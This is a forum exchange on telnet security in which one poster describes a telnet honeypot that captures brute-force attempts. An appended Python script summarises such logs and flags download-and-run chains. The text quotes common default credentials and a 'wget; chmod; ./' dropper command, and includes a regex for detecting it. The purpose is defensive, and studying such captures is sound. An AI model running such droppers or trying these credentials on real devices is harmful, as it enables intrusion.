As always, the best practice recommendation is to disable telnet logins entirely as it represents a security issue because passwords pass over the connection in clear plaintext.
- Brian
Well, the issue is not really the passwords being in plaintext. The issue is the availability of a remote login feature with possibly weak passwords. It affects SSH just as much as it affects telnet. The malevolents are scanning the IPv4 space and when they can connect to a remote logon service (telnet, SSH, RDP, VNC) they try a number of common usernames and passwords. They are not listening in on your traffic. While it is clear that telnet is not the most secure login service, it really doesn't make a difference.
I have a fake telnetd running on one of my systems that simply presents the user with a login prompt and logs what is being typed, and it shows endless connections trying things like root/12345 root/password admin/admin etc. They probably get into certain routers or other systems like that, then install some trojan that does further scanning. This is also indicated by certain loggings where they apparently believe they got logged in and then send a long string like "wget something; chmod a+x something; ./something" or similar.
Rob
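
The kind of review Rob describes can be automated over a honeypot's capture log. The following is an added example, not part of the post or of Rob's fake telnetd: it groups captured input by source address, pairs each username with the password typed after it, and flags the fetch, chmod, execute chain quoted above. The log layout, the sample lines and the names `summarise` and `DROPPER` are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines; the "<time> <source> <field> <value>" layout is an
# assumption for this example, not the format of any particular honeypot.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.5 login root
2024-05-01T10:00:02Z 203.0.113.5 password 12345
2024-05-01T10:00:04Z 203.0.113.5 login root
2024-05-01T10:00:05Z 203.0.113.5 password password
2024-05-01T10:01:10Z 198.51.100.7 login admin
2024-05-01T10:01:11Z 198.51.100.7 password admin
2024-05-01T10:01:12Z 198.51.100.7 input wget something; chmod a+x something; ./something
2024-05-01T10:02:00Z 192.0.2.9 login
"""

# Fetch a file, mark it executable, run it: the chain quoted in the post.
DROPPER = re.compile(r"\b(wget|curl|tftp)\b.*\bchmod\b.*\./\S+")

def summarise(log_text):
    """Group captured input by source address.

    Returns {source: {"creds": [(user, password), ...], "dropper": bool}}.
    """
    report = defaultdict(lambda: {"creds": [], "dropper": False})
    pending_user = {}  # source -> last username typed, awaiting its password
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue  # malformed line
        _, src, field = parts[:3]
        value = parts[3] if len(parts) == 4 else ""  # client sent an empty line
        entry = report[src]
        if field == "login":
            pending_user[src] = value
        elif field == "password":
            entry["creds"].append((pending_user.pop(src, ""), value))
        elif field == "input" and DROPPER.search(value):
            entry["dropper"] = True
    return dict(report)

if __name__ == "__main__":
    for src, info in summarise(SAMPLE_LOG).items():
        print(src, info["creds"], "dropper" if info["dropper"] else "")
```

Sources that reach the `input` stage with a dropper chain are the ones that believed a guessed login succeeded, which makes their credential pairs the first to check against your own devices.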